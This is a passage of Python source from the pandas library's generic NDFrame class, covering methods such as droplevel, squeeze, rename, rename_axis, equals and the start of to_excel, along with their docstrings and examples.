if i == j:
if copy:
return self.copy()
return self
mapping = {i: j, j: i}
new_axes = (self._get_axis(mapping.get(k, k)) for k in range(self._AXIS_LEN))
new_values = self.values.swapaxes(i, j)
if copy:
new_values = new_values.copy()
return self._constructor(new_values, *new_axes).__finalize__(self)
def droplevel(self: FrameOrSeries, level, axis=0) -> FrameOrSeries:
"""
Return DataFrame with requested index / column level(s) removed.
.. versionadded:: 0.24.0
Parameters
----------
level : int, str, or list-like
If a string is given, must be the name of a level
If list-like, elements must be names or positional indexes
of levels.
axis : {0 or 'index', 1 or 'columns'}, default 0
Axis along which the level(s) is removed:
* 0 or 'index': remove level(s) in column.
* 1 or 'columns': remove level(s) in row.
Returns
-------
DataFrame
DataFrame with requested index / column level(s) removed.
Examples
--------
>>> df = pd.DataFrame([
... [1, 2, 3, 4],
... [5, 6, 7, 8],
... [9, 10, 11, 12]
... ]).set_index([0, 1]).rename_axis(['a', 'b'])
>>> df.columns = pd.MultiIndex.from_tuples([
... ('c', 'e'), ('d', 'f')
... ], names=['level_1', 'level_2'])
>>> df
level_1 c d
level_2 e f
a b
1 2 3 4
5 6 7 8
9 10 11 12
>>> df.droplevel('a')
level_1 c d
level_2 e f
b
2 3 4
6 7 8
10 11 12
>>> df.droplevel('level_2', axis=1)
level_1 c d
a b
1 2 3 4
5 6 7 8
9 10 11 12
"""
labels = self._get_axis(axis)
new_labels = labels.droplevel(level)
result = self.set_axis(new_labels, axis=axis, inplace=False)
return result
def pop(self: FrameOrSeries, item) -> FrameOrSeries:
"""
Return item and drop from frame. Raise KeyError if not found.
Parameters
----------
item : str
Label of column to be popped.
Returns
-------
Series
Examples
--------
>>> df = pd.DataFrame([('falcon', 'bird', 389.0),
... ('parrot', 'bird', 24.0),
... ('lion', 'mammal', 80.5),
... ('monkey', 'mammal', np.nan)],
... columns=('name', 'class', 'max_speed'))
>>> df
name class max_speed
0 falcon bird 389.0
1 parrot bird 24.0
2 lion mammal 80.5
3 monkey mammal NaN
>>> df.pop('class')
0 bird
1 bird
2 mammal
3 mammal
Name: class, dtype: object
>>> df
name max_speed
0 falcon 389.0
1 parrot 24.0
2 lion 80.5
3 monkey NaN
"""
result = self[item]
del self[item]
try:
result._reset_cacher()
except AttributeError:
pass
return result
def squeeze(self, axis=None):
"""
Squeeze 1 dimensional axis objects into scalars.
Series or DataFrames with a single element are squeezed to a scalar.
DataFrames with a single column or a single row are squeezed to a
Series. Otherwise the object is unchanged.
This method is most useful when you don't know if your
object is a Series or DataFrame, but you do know it has just a single
column. In that case you can safely call `squeeze` to ensure you have a
Series.
Parameters
----------
axis : {0 or 'index', 1 or 'columns', None}, default None
A specific axis to squeeze. By default, all length-1 axes are
squeezed.
Returns
-------
DataFrame, Series, or scalar
The projection after squeezing `axis` or all the axes.
See Also
--------
Series.iloc : Integer-location based indexing for selecting scalars.
DataFrame.iloc : Integer-location based indexing for selecting Series.
Series.to_frame : Inverse of DataFrame.squeeze for a
single-column DataFrame.
Examples
--------
>>> primes = pd.Series([2, 3, 5, 7])
Slicing might produce a Series with a single value:
>>> even_primes = primes[primes % 2 == 0]
>>> even_primes
0 2
dtype: int64
>>> even_primes.squeeze()
2
Squeezing objects with more than one value in every axis does nothing:
>>> odd_primes = primes[primes % 2 == 1]
>>> odd_primes
1 3
2 5
3 7
dtype: int64
>>> odd_primes.squeeze()
1 3
2 5
3 7
dtype: int64
Squeezing is even more effective when used with DataFrames.
>>> df = pd.DataFrame([[1, 2], [3, 4]], columns=['a', 'b'])
>>> df
a b
0 1 2
1 3 4
Slicing a single column will produce a DataFrame with the columns
having only one value:
>>> df_a = df[['a']]
>>> df_a
a
0 1
1 3
So the columns can be squeezed down, resulting in a Series:
>>> df_a.squeeze('columns')
0 1
1 3
Name: a, dtype: int64
Slicing a single row from a single column will produce a single
scalar DataFrame:
>>> df_0a = df.loc[df.index < 1, ['a']]
>>> df_0a
a
0 1
Squeezing the rows produces a single scalar Series:
>>> df_0a.squeeze('rows')
a 1
Name: 0, dtype: int64
Squeezing all axes will project directly into a scalar:
>>> df_0a.squeeze()
1
"""
axis = self._AXIS_NAMES if axis is None else (self._get_axis_number(axis),)
return self.iloc[
tuple(
0 if i in axis and len(a) == 1 else slice(None)
for i, a in enumerate(self.axes)
)
]
# ----------------------------------------------------------------------
# Rename
def rename(
self: FrameOrSeries,
mapper: Optional[Renamer] = None,
*,
index: Optional[Renamer] = None,
columns: Optional[Renamer] = None,
axis: Optional[Axis] = None,
copy: bool = True,
inplace: bool = False,
level: Optional[Level] = None,
errors: str = "ignore",
) -> Optional[FrameOrSeries]:
"""
Alter axes input function or functions. Function / dict values must be
unique (1-to-1). Labels not contained in a dict / Series will be left
as-is. Extra labels listed don't throw an error. Alternatively, change
``Series.name`` with a scalar value (Series only).
Parameters
----------
%(axes)s : scalar, list-like, dict-like or function, optional
Scalar or list-like will alter the ``Series.name`` attribute,
and raise on DataFrame.
dict-like or functions are transformations to apply to
that axis' values
copy : bool, default True
Also copy underlying data.
inplace : bool, default False
Whether to return a new %(klass)s. If True then value of copy is
ignored.
level : int or level name, default None
In case of a MultiIndex, only rename labels in the specified
level.
errors : {'ignore', 'raise'}, default 'ignore'
If 'raise', raise a `KeyError` when a dict-like `mapper`, `index`,
or `columns` contains labels that are not present in the Index
being transformed.
If 'ignore', existing keys will be renamed and extra keys will be
ignored.
Returns
-------
renamed : %(klass)s (new object)
Raises
------
KeyError
If any of the labels is not found in the selected axis and
"errors='raise'".
See Also
--------
NDFrame.rename_axis
Examples
--------
>>> s = pd.Series([1, 2, 3])
>>> s
0 1
1 2
2 3
dtype: int64
>>> s.rename("my_name") # scalar, changes Series.name
0 1
1 2
2 3
Name: my_name, dtype: int64
>>> s.rename(lambda x: x ** 2) # function, changes labels
0 1
1 2
4 3
dtype: int64
>>> s.rename({1: 3, 2: 5}) # mapping, changes labels
0 1
3 2
5 3
dtype: int64
Since ``DataFrame`` doesn't have a ``.name`` attribute,
only mapping-type arguments are allowed.
>>> df = pd.DataFrame({"A": [1, 2, 3], "B": [4, 5, 6]})
>>> df.rename(2)
Traceback (most recent call last):
...
TypeError: 'int' object is not callable
``DataFrame.rename`` supports two calling conventions
* ``(index=index_mapper, columns=columns_mapper, ...)``
* ``(mapper, axis={'index', 'columns'}, ...)``
We *highly* recommend using keyword arguments to clarify your
intent.
>>> df.rename(index=str, columns={"A": "a", "B": "c"})
a c
0 1 4
1 2 5
2 3 6
>>> df.rename(index=str, columns={"A": "a", "C": "c"})
a B
0 1 4
1 2 5
2 3 6
Using axis-style parameters
>>> df.rename(str.lower, axis='columns')
a b
0 1 4
1 2 5
2 3 6
>>> df.rename({1: 2, 2: 4}, axis='index')
A B
0 1 4
2 2 5
4 3 6
See the :ref:`user guide <basics.rename>` for more.
"""
if mapper is None and index is None and columns is None:
raise TypeError("must pass an index to rename")
if index is not None or columns is not None:
if axis is not None:
raise TypeError(
"Cannot specify both 'axis' and any of 'index' or 'columns'"
)
elif mapper is not None:
raise TypeError(
"Cannot specify both 'mapper' and any of 'index' or 'columns'"
)
else:
# use the mapper argument
if axis and self._get_axis_number(axis) == 1:
columns = mapper
else:
index = mapper
result = self if inplace else self.copy(deep=copy)
for axis_no, replacements in enumerate((index, columns)):
if replacements is None:
continue
ax = self._get_axis(axis_no)
baxis = self._get_block_manager_axis(axis_no)
f = com.get_rename_function(replacements)
if level is not None:
level = ax._get_level_number(level)
# GH 13473
if not callable(replacements):
indexer = ax.get_indexer_for(replacements)
if errors == "raise" and len(indexer[indexer == -1]):
missing_labels = [
label
for index, label in enumerate(replacements)
if indexer[index] == -1
]
raise KeyError(f"{missing_labels} not found in axis")
result._data = result._data.rename_axis(
f, axis=baxis, copy=copy, level=level
)
result._clear_item_cache()
if inplace:
self._update_inplace(result._data)
return None
else:
return result.__finalize__(self)
@rewrite_axis_style_signature("mapper", [("copy", True), ("inplace", False)])
def rename_axis(self, mapper=lib.no_default, **kwargs):
"""
Set the name of the axis for the index or columns.
Parameters
----------
mapper : scalar, list-like, optional
Value to set the axis name attribute.
index, columns : scalar, list-like, dict-like or function, optional
A scalar, list-like, dict-like or functions transformations to
apply to that axis' values.
Use either ``mapper`` and ``axis`` to
specify the axis to target with ``mapper``, or ``index``
and/or ``columns``.
.. versionchanged:: 0.24.0
axis : {0 or 'index', 1 or 'columns'}, default 0
The axis to rename.
copy : bool, default True
Also copy underlying data.
inplace : bool, default False
Modifies the object directly, instead of creating a new Series
or DataFrame.
Returns
-------
Series, DataFrame, or None
The same type as the caller or None if `inplace` is True.
See Also
--------
Series.rename : Alter Series index labels or name.
DataFrame.rename : Alter DataFrame index labels or name.
Index.rename : Set new names on index.
Notes
-----
``DataFrame.rename_axis`` supports two calling conventions
* ``(index=index_mapper, columns=columns_mapper, ...)``
* ``(mapper, axis={'index', 'columns'}, ...)``
The first calling convention will only modify the names of
the index and/or the names of the Index object that is the columns.
In this case, the parameter ``copy`` is ignored.
The second calling convention will modify the names of the
the corresponding index if mapper is a list or a scalar.
However, if mapper is dict-like or a function, it will use the
deprecated behavior of modifying the axis *labels*.
We *highly* recommend using keyword arguments to clarify your
intent.
Examples
--------
**Series**
>>> s = pd.Series(["dog", "cat", "monkey"])
>>> s
0 dog
1 cat
2 monkey
dtype: object
>>> s.rename_axis("animal")
animal
0 dog
1 cat
2 monkey
dtype: object
**DataFrame**
>>> df = pd.DataFrame({"num_legs": [4, 4, 2],
... "num_arms": [0, 0, 2]},
... ["dog", "cat", "monkey"])
>>> df
num_legs num_arms
dog 4 0
cat 4 0
monkey 2 2
>>> df = df.rename_axis("animal")
>>> df
num_legs num_arms
animal
dog 4 0
cat 4 0
monkey 2 2
>>> df = df.rename_axis("limbs", axis="columns")
>>> df
limbs num_legs num_arms
animal
dog 4 0
cat 4 0
monkey 2 2
**MultiIndex**
>>> df.index = pd.MultiIndex.from_product([['mammal'],
... ['dog', 'cat', 'monkey']],
... names=['type', 'name'])
>>> df
limbs num_legs num_arms
type name
mammal dog 4 0
cat 4 0
monkey 2 2
>>> df.rename_axis(index={'type': 'class'})
limbs num_legs num_arms
class name
mammal dog 4 0
cat 4 0
monkey 2 2
>>> df.rename_axis(columns=str.upper)
LIMBS num_legs num_arms
type name
mammal dog 4 0
cat 4 0
monkey 2 2
"""
axes, kwargs = self._construct_axes_from_arguments(
(), kwargs, sentinel=lib.no_default
)
copy = kwargs.pop("copy", True)
inplace = kwargs.pop("inplace", False)
axis = kwargs.pop("axis", 0)
if axis is not None:
axis = self._get_axis_number(axis)
if kwargs:
raise TypeError(
"rename_axis() got an unexpected keyword "
f'argument "{list(kwargs.keys())[0]}"'
)
inplace = validate_bool_kwarg(inplace, "inplace")
if mapper is not lib.no_default:
# Use v0.23 behavior if a scalar or list
non_mapper = is_scalar(mapper) or (
is_list_like(mapper) and not is_dict_like(mapper)
)
if non_mapper:
return self._set_axis_name(mapper, axis=axis, inplace=inplace)
else:
raise ValueError("Use `.rename` to alter labels with a mapper.")
else:
# Use new behavior. Means that index and/or columns
# is specified
result = self if inplace else self.copy(deep=copy)
for axis in range(self._AXIS_LEN):
v = axes.get(self._AXIS_NAMES[axis])
if v is lib.no_default:
continue
non_mapper = is_scalar(v) or (is_list_like(v) and not is_dict_like(v))
if non_mapper:
newnames = v
else:
f = com.get_rename_function(v)
curnames = self._get_axis(axis).names
newnames = [f(name) for name in curnames]
result._set_axis_name(newnames, axis=axis, inplace=True)
if not inplace:
return result
def _set_axis_name(self, name, axis=0, inplace=False):
"""
Set the name(s) of the axis.
Parameters
----------
name : str or list of str
Name(s) to set.
axis : {0 or 'index', 1 or 'columns'}, default 0
The axis to set the label. The value 0 or 'index' specifies index,
and the value 1 or 'columns' specifies columns.
inplace : bool, default False
If `True`, do operation inplace and return None.
.. versionadded:: 0.21.0
Returns
-------
Series, DataFrame, or None
The same type as the caller or `None` if `inplace` is `True`.
See Also
--------
DataFrame.rename : Alter the axis labels of :class:`DataFrame`.
Series.rename : Alter the index labels or set the index name
of :class:`Series`.
Index.rename : Set the name of :class:`Index` or :class:`MultiIndex`.
Examples
--------
>>> df = pd.DataFrame({"num_legs": [4, 4, 2]},
... ["dog", "cat", "monkey"])
>>> df
num_legs
dog 4
cat 4
monkey 2
>>> df._set_axis_name("animal")
num_legs
animal
dog 4
cat 4
monkey 2
>>> df.index = pd.MultiIndex.from_product(
... [["mammal"], ['dog', 'cat', 'monkey']])
>>> df._set_axis_name(["type", "name"])
legs
type name
mammal dog 4
cat 4
monkey 2
"""
axis = self._get_axis_number(axis)
idx = self._get_axis(axis).set_names(name)
inplace = validate_bool_kwarg(inplace, "inplace")
renamed = self if inplace else self.copy()
renamed.set_axis(idx, axis=axis, inplace=True)
if not inplace:
return renamed
# ----------------------------------------------------------------------
# Comparison Methods
def _indexed_same(self, other) -> bool:
return all(
self._get_axis(a).equals(other._get_axis(a)) for a in self._AXIS_ORDERS
)
def equals(self, other):
"""
Test whether two objects contain the same elements.
This function allows two Series or DataFrames to be compared against
each other to see if they have the same shape and elements. NaNs in
the same location are considered equal. The column headers do not
need to have the same type, but the elements within the columns must
be the same dtype.
Parameters
----------
other : Series or DataFrame
The other Series or DataFrame to be compared with the first.
Returns
-------
bool
True if all elements are the same in both objects, False
otherwise.
See Also
--------
Series.eq : Compare two Series objects of the same length
and return a Series where each element is True if the element
in each Series is equal, False otherwise.
DataFrame.eq : Compare two DataFrame objects of the same shape and
return a DataFrame where each element is True if the respective
element in each DataFrame is equal, False otherwise.
testing.assert_series_equal : Raises an AssertionError if left and
right are not equal. Provides an easy interface to ignore
inequality in dtypes, indexes and precision among others.
testing.assert_frame_equal : Like assert_series_equal, but targets
DataFrames.
numpy.array_equal : Return True if two arrays have the same shape
and elements, False otherwise.
Notes
-----
This function requires that the elements have the same dtype as their
respective elements in the other Series or DataFrame. However, the
column labels do not need to have the same type, as long as they are
still considered equal.
Examples
--------
>>> df = pd.DataFrame({1: [10], 2: [20]})
>>> df
1 2
0 10 20
DataFrames df and exactly_equal have the same types and values for
their elements and column labels, which will return True.
>>> exactly_equal = pd.DataFrame({1: [10], 2: [20]})
>>> exactly_equal
1 2
0 10 20
>>> df.equals(exactly_equal)
True
DataFrames df and different_column_type have the same element
types and values, but have different types for the column labels,
which will still return True.
>>> different_column_type = pd.DataFrame({1.0: [10], 2.0: [20]})
>>> different_column_type
1.0 2.0
0 10 20
>>> df.equals(different_column_type)
True
DataFrames df and different_data_type have different types for the
same values for their elements, and will return False even though
their column labels are the same values and types.
>>> different_data_type = pd.DataFrame({1: [10.0], 2: [20.0]})
>>> different_data_type
1 2
0 10.0 20.0
>>> df.equals(different_data_type)
False
"""
if not isinstance(other, self._constructor):
return False
return self._data.equals(other._data)
# -------------------------------------------------------------------------
# Unary Methods
def __neg__(self):
values = com.values_from_object(self)
if is_bool_dtype(values):
arr = operator.inv(values)
elif (
is_numeric_dtype(values)
or is_timedelta64_dtype(values)
or is_object_dtype(values)
):
arr = operator.neg(values)
else:
raise TypeError(f"Unary negative expects numeric dtype, not {values.dtype}")
return self.__array_wrap__(arr)
def __pos__(self):
values = com.values_from_object(self)
if is_bool_dtype(values) or is_period_arraylike(values):
arr = values
elif (
is_numeric_dtype(values)
or is_timedelta64_dtype(values)
or is_object_dtype(values)
):
arr = operator.pos(values)
else:
raise TypeError(f"Unary plus expects numeric dtype, not {values.dtype}")
return self.__array_wrap__(arr)
def __invert__(self):
if not self.size:
# inv fails with 0 len
return self
new_data = self._data.apply(operator.invert)
result = self._constructor(new_data).__finalize__(self)
return result
def __nonzero__(self):
raise ValueError(
f"The truth value of a {type(self).__name__} is ambiguous. "
"Use a.empty, a.bool(), a.item(), a.any() or a.all()."
)
__bool__ = __nonzero__
def bool(self):
"""
Return the bool of a single element PandasObject.
This must be a boolean scalar value, either True or False. Raise a
ValueError if the PandasObject does not have exactly 1 element, or that
element is not boolean
Returns
-------
bool
Same single boolean value converted to bool type.
"""
v = self.squeeze()
if isinstance(v, (bool, np.bool_)):
return bool(v)
elif is_scalar(v):
raise ValueError(
"bool cannot act on a non-boolean single element "
f"{type(self).__name__}"
)
self.__nonzero__()
def __abs__(self: FrameOrSeries) -> FrameOrSeries:
return self.abs()
def __round__(self: FrameOrSeries, decimals: int = 0) -> FrameOrSeries:
return self.round(decimals)
# -------------------------------------------------------------------------
# Label or Level Combination Helpers
#
# A collection of helper methods for DataFrame/Series operations that
# accept a combination of column/index labels and levels. All such
# operations should utilize/extend these methods when possible so that we
# have consistent precedence and validation logic throughout the library.
def _is_level_reference(self, key, axis=0):
"""
Test whether a key is a level reference for a given axis.
To be considered a level reference, `key` must be a string that:
- (axis=0): Matches the name of an index level and does NOT match
a column label.
- (axis=1): Matches the name of a column level and does NOT match
an index label.
Parameters
----------
key : str
Potential level name for the given axis
axis : int, default 0
Axis that levels are associated with (0 for index, 1 for columns)
Returns
-------
is_level : bool
"""
axis = self._get_axis_number(axis)
return (
key is not None
and is_hashable(key)
and key in self.axes[axis].names
and not self._is_label_reference(key, axis=axis)
)
def _is_label_reference(self, key, axis=0) -> bool_t:
"""
Test whether a key is a label reference for a given axis.
To be considered a label reference, `key` must be a string that:
- (axis=0): Matches a column label
- (axis=1): Matches an index label
Parameters
----------
key: str
Potential label name
axis: int, default 0
Axis perpendicular to the axis that labels are associated with
(0 means search for column labels, 1 means search for index labels)
Returns
-------
is_label: bool
"""
axis = self._get_axis_number(axis)
other_axes = (ax for ax in range(self._AXIS_LEN) if ax != axis)
return (
key is not None
and is_hashable(key)
and any(key in self.axes[ax] for ax in other_axes)
)
def _is_label_or_level_reference(self, key: str, axis: int = 0) -> bool_t:
"""
Test whether a key is a label or level reference for a given axis.
To be considered either a label or a level reference, `key` must be a
string that:
- (axis=0): Matches a column label or an index level
- (axis=1): Matches an index label or a column level
Parameters
----------
key: str
Potential label or level name
axis: int, default 0
Axis that levels are associated with (0 for index, 1 for columns)
Returns
-------
is_label_or_level: bool
"""
return self._is_level_reference(key, axis=axis) or self._is_label_reference(
key, axis=axis
)
def _check_label_or_level_ambiguity(self, key, axis: int = 0) -> None:
"""
Check whether `key` is ambiguous.
By ambiguous, we mean that it matches both a level of the input
`axis` and a label of the other axis.
Parameters
----------
key: str or object
Label or level name.
axis: int, default 0
Axis that levels are associated with (0 for index, 1 for columns).
Raises
------
ValueError: `key` is ambiguous
"""
axis = self._get_axis_number(axis)
other_axes = (ax for ax in range(self._AXIS_LEN) if ax != axis)
if (
key is not None
and is_hashable(key)
and key in self.axes[axis].names
and any(key in self.axes[ax] for ax in other_axes)
):
# Build an informative and grammatical warning
level_article, level_type = (
("an", "index") if axis == 0 else ("a", "column")
)
label_article, label_type = (
("a", "column") if axis == 0 else ("an", "index")
)
msg = (
f"'{key}' is both {level_article} {level_type} level and "
f"{label_article} {label_type} label, which is ambiguous."
)
raise ValueError(msg)
def _get_label_or_level_values(self, key: str, axis: int = 0) -> np.ndarray:
"""
Return a 1-D array of values associated with `key`, a label or level
from the given `axis`.
Retrieval logic:
- (axis=0): Return column values if `key` matches a column label.
Otherwise return index level values if `key` matches an index
level.
- (axis=1): Return row values if `key` matches an index label.
Otherwise return column level values if 'key' matches a column
level
Parameters
----------
key: str
Label or level name.
axis: int, default 0
Axis that levels are associated with (0 for index, 1 for columns)
Returns
-------
values: np.ndarray
Raises
------
KeyError
if `key` matches neither a label nor a level
ValueError
if `key` matches multiple labels
FutureWarning
if `key` is ambiguous. This will become an ambiguity error in a
future version
"""
axis = self._get_axis_number(axis)
other_axes = [ax for ax in range(self._AXIS_LEN) if ax != axis]
if self._is_label_reference(key, axis=axis):
self._check_label_or_level_ambiguity(key, axis=axis)
values = self.xs(key, axis=other_axes[0])._values
elif self._is_level_reference(key, axis=axis):
values = self.axes[axis].get_level_values(key)._values
else:
raise KeyError(key)
# Check for duplicates
if values.ndim > 1:
if other_axes and isinstance(self._get_axis(other_axes[0]), MultiIndex):
multi_message = (
"\n"
"For a multi-index, the label must be a "
"tuple with elements corresponding to each level."
)
else:
multi_message = ""
label_axis_name = "column" if axis == 0 else "index"
raise ValueError(
(
f"The {label_axis_name} label '{key}' "
f"is not unique.{multi_message}"
)
)
return values
def _drop_labels_or_levels(self, keys, axis: int = 0):
"""
Drop labels and/or levels for the given `axis`.
For each key in `keys`:
- (axis=0): If key matches a column label then drop the column.
Otherwise if key matches an index level then drop the level.
- (axis=1): If key matches an index label then drop the row.
Otherwise if key matches a column level then drop the level.
Parameters
----------
keys: str or list of str
labels or levels to drop
axis: int, default 0
Axis that levels are associated with (0 for index, 1 for columns)
Returns
-------
dropped: DataFrame
Raises
------
ValueError
if any `keys` match neither a label nor a level
"""
axis = self._get_axis_number(axis)
# Validate keys
keys = com.maybe_make_list(keys)
invalid_keys = [
k for k in keys if not self._is_label_or_level_reference(k, axis=axis)
]
if invalid_keys:
raise ValueError(
(
"The following keys are not valid labels or "
f"levels for axis {axis}: {invalid_keys}"
)
)
# Compute levels and labels to drop
levels_to_drop = [k for k in keys if self._is_level_reference(k, axis=axis)]
labels_to_drop = [k for k in keys if not self._is_level_reference(k, axis=axis)]
# Perform copy upfront and then use inplace operations below.
# This ensures that we always perform exactly one copy.
# ``copy`` and/or ``inplace`` options could be added in the future.
dropped = self.copy()
if axis == 0:
# Handle dropping index levels
if levels_to_drop:
dropped.reset_index(levels_to_drop, drop=True, inplace=True)
# Handle dropping columns labels
if labels_to_drop:
dropped.drop(labels_to_drop, axis=1, inplace=True)
else:
# Handle dropping column levels
if levels_to_drop:
if isinstance(dropped.columns, MultiIndex):
# Drop the specified levels from the MultiIndex
dropped.columns = dropped.columns.droplevel(levels_to_drop)
else:
# Drop the last level of Index by replacing with
# a RangeIndex
dropped.columns = RangeIndex(dropped.columns.size)
# Handle dropping index labels
if labels_to_drop:
dropped.drop(labels_to_drop, axis=0, inplace=True)
return dropped
# ----------------------------------------------------------------------
# Iteration
def __hash__(self):
raise TypeError(
f"{repr(type(self).__name__)} objects are mutable, "
f"thus they cannot be hashed"
)
def __iter__(self):
"""
Iterate over info axis.
Returns
-------
iterator
Info axis as iterator.
"""
return iter(self._info_axis)
# can we get a better explanation of this?
def keys(self):
"""
Get the 'info axis' (see Indexing for more).
This is index for Series, columns for DataFrame.
Returns
-------
Index
Info axis.
"""
return self._info_axis
def items(self):
"""
Iterate over (label, values) on info axis
This is index for Series and columns for DataFrame.
Returns
-------
Generator
"""
for h in self._info_axis:
yield h, self[h]
@Appender(items.__doc__)
def iteritems(self):
return self.items()
def __len__(self) -> int:
"""Returns length of info axis"""
return len(self._info_axis)
def __contains__(self, key) -> bool_t:
"""True if the key is in the info axis"""
return key in self._info_axis
@property
def empty(self) -> bool_t:
"""
Indicator whether DataFrame is empty.
True if DataFrame is entirely empty (no items), meaning any of the
axes are of length 0.
Returns
-------
bool
If DataFrame is empty, return True, if not return False.
See Also
--------
Series.dropna : Return series without null values.
DataFrame.dropna : Return DataFrame with labels on given axis omitted
where (all or any) data are missing.
Notes
-----
If DataFrame contains only NaNs, it is still not considered empty. See
the example below.
Examples
--------
An example of an actual empty DataFrame. Notice the index is empty:
>>> df_empty = pd.DataFrame({'A' : []})
>>> df_empty
Empty DataFrame
Columns: [A]
Index: []
>>> df_empty.empty
True
If we only have NaNs in our DataFrame, it is not considered empty! We
will need to drop the NaNs to make the DataFrame empty:
>>> df = pd.DataFrame({'A' : [np.nan]})
>>> df
A
0 NaN
>>> df.empty
False
>>> df.dropna().empty
True
"""
return any(len(self._get_axis(a)) == 0 for a in self._AXIS_ORDERS)
# ----------------------------------------------------------------------
# Array Interface
# This is also set in IndexOpsMixin
# GH#23114 Ensure ndarray.__op__(DataFrame) returns NotImplemented
__array_priority__ = 1000
def __array__(self, dtype=None) -> np.ndarray:
return com.values_from_object(self)
def __array_wrap__(self, result, context=None):
result = lib.item_from_zerodim(result)
if is_scalar(result):
# e.g. we get here with np.ptp(series)
# ptp also requires the item_from_zerodim
return result
d = self._construct_axes_dict(self._AXIS_ORDERS, copy=False)
return self._constructor(result, **d).__finalize__(self)
# ideally we would define this to avoid the getattr checks, but
# is slower
# @property
# def __array_interface__(self):
# """ provide numpy array interface method """
# values = self.values
# return dict(typestr=values.dtype.str,shape=values.shape,data=values)
# ----------------------------------------------------------------------
# Picklability
def __getstate__(self) -> Dict[str, Any]:
meta = {k: getattr(self, k, None) for k in self._metadata}
return dict(
_data=self._data,
_typ=self._typ,
_metadata=self._metadata,
attrs=self.attrs,
**meta,
)
def __setstate__(self, state):
if isinstance(state, BlockManager):
self._data = state
elif isinstance(state, dict):
typ = state.get("_typ")
if typ is not None:
attrs = state.get("_attrs", {})
object.__setattr__(self, "_attrs", attrs)
# set in the order of internal names
# to avoid definitional recursion
# e.g. say fill_value needing _data to be
# defined
meta = set(self._internal_names + self._metadata)
for k in list(meta):
if k in state:
v = state[k]
object.__setattr__(self, k, v)
for k, v in state.items():
if k not in meta:
object.__setattr__(self, k, v)
else:
raise NotImplementedError("Pre-0.12 pickles are no longer supported")
elif len(state) == 2:
raise NotImplementedError("Pre-0.12 pickles are no longer supported")
self._item_cache = {}
# ----------------------------------------------------------------------
# Rendering Methods
def __repr__(self) -> str:
# string representation based upon iterating over self
# (since, by definition, `PandasContainers` are iterable)
prepr = f"[{','.join(map(pprint_thing, self))}]"
return f"{type(self).__name__}({prepr})"
def _repr_latex_(self):
"""
Returns a LaTeX representation for a particular object.
Mainly for use with nbconvert (jupyter notebook conversion to pdf).
"""
if config.get_option("display.latex.repr"):
return self.to_latex()
else:
return None
def _repr_data_resource_(self):
"""
Not a real Jupyter special repr method, but we use the same
naming convention.
"""
if config.get_option("display.html.table_schema"):
data = self.head(config.get_option("display.max_rows"))
payload = json.loads(
data.to_json(orient="table"), object_pairs_hook=collections.OrderedDict
)
return payload
# ----------------------------------------------------------------------
# I/O Methods
_shared_docs[
"to_markdown"
] = """
Print %(klass)s in Markdown-friendly format.
.. versionadded:: 1.0.0
Parameters
----------
buf : str, Path or StringIO-like, optional, default None
Buffer to write to. If None, the output is returned as a string.
mode : str, optional
Mode in which file is opened.
**kwargs
These parameters will be passed to `tabulate`.
Returns
-------
str
%(klass)s in Markdown-friendly format.
"""
_shared_docs[
"to_excel"
] = """
Write %(klass)s to an Excel sheet.
To write a single %(klass)s to an Excel .xlsx file it is only necessary to
specify a target file name. To write to multiple sheets it is necessary to
create an `ExcelWriter` object with a target file name, and specify a sheet
in the file to write to.
Multiple sheets may be written to by specifying unique `sheet_name`.
With all data written to the file it is necessary to save the changes.
Note that creating an `ExcelWriter` object with a file name that already
exists will result in the contents of the existing file being erased.
Parameters
----------
excel_writer : str or ExcelWriter object
File path or existing ExcelWriter.
sheet_name : str, default 'Sheet1'
Name of sheet which will contain DataFrame.
na_rep : str, default ''
Missing data representation.
float_format : str, optional
Format string for floating point numbers. For example
``float_format="%%.2f"`` will format 0.1234 to 0.12.
columns : sequence or list of str, optional
Columns to write.
header : bool or list of str, default True
Write out the column names. If a list of string is given it is
assumed to be aliases for the column names.
index : bool, default True
Write row names (index).
index_label : str or sequence, optional
Column label for index column(s) if desired. If not specified, and
`header` and `index` are True, then the index names are used. A
sequence should be given if the DataFrame uses MultiIndex.
startrow : int, default 0
Upper left cell row to dump data frame.
startcol : int, default 0
Upper left cell column to dump data frame.
engine : str, optional
Write engine to use, 'openpyxl' or 'xlsxwriter'. You can also set this
via the options ``io.excel.xlsx.writer``, ``io.excel.xls.writer``, and
``io.excel.xlsm.writer``.
merge_cells : bool, default True
Write MultiIndex and Hierarchical Rows as merged cells.
encoding : str, optional
Encoding of the resulting excel file. Only necessary for xlwt,
other writers support unicode natively.
inf_rep : str, default 'inf'
Representation for infinity (there is no native representation for
infinity in Excel).
verbose : bool, default True
Display more information in the error logs.
freeze_panes : tuple of int (length 2), optional
Specifies the one-based bottommost row and rightmost column that
is to be frozen.
See Also
--------
to_csv : Write DataFrame to a comma-separated values (csv) file.
ExcelWriter : Class for writing DataFrame objects into excel sheets.
read_excel : Read an Excel file into a pandas DataFrame.
read_csv : Read a comma-separated values (csv) file into DataFrame.
Notes
-----
For compatibility with :meth:`~DataFrame.to_csv`,
to_excel serializes lists and dicts to strings before writing.
Once a workbook has been saved it is not possible write further data
without rewriting the whole workbook.
Examples
--------
Create, write to and save a workbook:
>>> df1 = pd.DataFrame([['a', 'b'], ['c', 'd']],
... index=['row 1', 'row 2'],
... columns=['col 1', 'col 2'])
>>> df1.to_excel("output.xlsx") # doctest: +SKIP
To specify the sheet name:
>>> df1.to_excel("output.xlsx",
... sheet_name='Sheet_name_1') # doctest: +SKIP
If you wish to write to more than one sheet in the workbook, it is
necessary to specify an ExcelWriter object:
>>> df2 = df1.copy()
>>> with pd.ExcelWriter('output.xlsx') as writer: # doctest: +SKIP
... df1.to_excel(writer, sheet_name='Sheet_name_1')
... df2.to_excel(writer, sheet_name='Sheet_name_2')
ExcelWriter can also be used to append to an existing Excel file:
>>> with pd.ExcelWriter('output.xlsx',
... mode='a') as writer: # doctest: +SKIP
... df.to_excel(writer, sheet_name='Sheet_name_3')
To set the library that is used to write the Excel file,
you can pass the `engine` keyword (the default engine is
automatically chosen depending on the file extension):
>>> df1.to_excel('output1.xlsx', engine='xlsxwriter') # doctest: +SKIP
"""
@Appender(_shared_docs["to_excel"] % dict(klass="object"))
def to_excel(
self,
excel_writer,
sheet_name="Sheet1",
na_rep="",
float_format=None,
columns=None,
header=True,
index=True,
index_label=None,
startrow=0,
startcol=0,
engine=None,
merge_cells=True,
encoding=None,
inf_rep="inf",
verbose=True,
freeze_panes=None,
) -> None:
df = self if isinstance(self, ABCDataFrame) else self.to_frame()
from pandas.io.formats.excel import ExcelFormatter
formatter = ExcelFormatter(
df,
na_rep=na_rep,
cols=columns,
header=header,
